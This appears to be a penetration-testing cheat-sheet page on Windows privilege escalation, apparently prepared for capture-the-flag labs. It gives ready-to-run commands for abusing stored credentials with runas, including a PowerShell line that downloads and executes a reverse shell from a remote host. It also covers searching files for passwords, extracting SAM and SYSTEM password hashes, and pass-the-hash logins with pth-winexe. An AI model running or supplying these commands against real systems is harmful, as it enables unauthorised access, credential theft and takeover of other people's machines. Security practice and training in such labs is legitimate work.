> For the complete documentation index, see [llms.txt](https://coffeetohack.gitbook.io/coffeetohack/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://coffeetohack.gitbook.io/coffeetohack/windows/runas.md).

# Run As

Check if there are stored credentials: **cmdkey /list**

```
#Suppose you find stored credentials for the user ACCESS/Administrator

#You can use this to run commands as administrator:
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Desktop\root.txt"

#Or you can also use this to spawn a reverse shell: (Nishang shell not on victim machine)
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.11/shell.ps1')"

#Or you can also use this to spawn a reverse shell: (Nishang shell on victim machine)
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"

#msfvenom shell:
runas /user:ACCESS\administrator /savecred "C:\Temp\reverse.exe"
```

## PASSWORDS IN FILES:

```
#Check if there is Unattend.xml file. It might contain passwords or other info. This file can be detected in winPEAS

#You can try manually querying the output:
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt

#If you find the admin password then you can use winexe to login as admin:
winexe -U 'admin%pass' //10.10.10.10 cmd.exe 
```

## SAM & SYSTEM:

Windows stores password hashes in the Security Account Manager (SAM). These hashes are encrypted with a key which can found in SYSTEM file. You can use both of these files to extract the hashes if you have read permissions. Both of these files are located in C:\Windows\System32\config. These files are locked when windows is running. But you can find backup of these files at C:\Windows\Repair or C:\Windows\System32\RegBack directory.&#x20;

```
#You can use samdump or pwdump to extract the hashes:
python pwdump.py SYSTEM SAM

#Crack the password using JTR or Hashcat

#Then use winexe to spawn a shell
```

## PASS THE HASH:

Windows accepts hashes instead of passwords to authenticate to a number of services. We can use a modified version of winexe, pth-winexe to spawn a command prompt using admin user's hash.&#x20;

```
#You dont need to crack the hashes.
pth-winexe -U 'admin%fullHash' //10.10.10.10 cmd.exe      (This will give admin shell)
pth-winexe -U 'admin%fullHash' --system //10.10.10.10 cmd.exe   (This will give system shell)
```
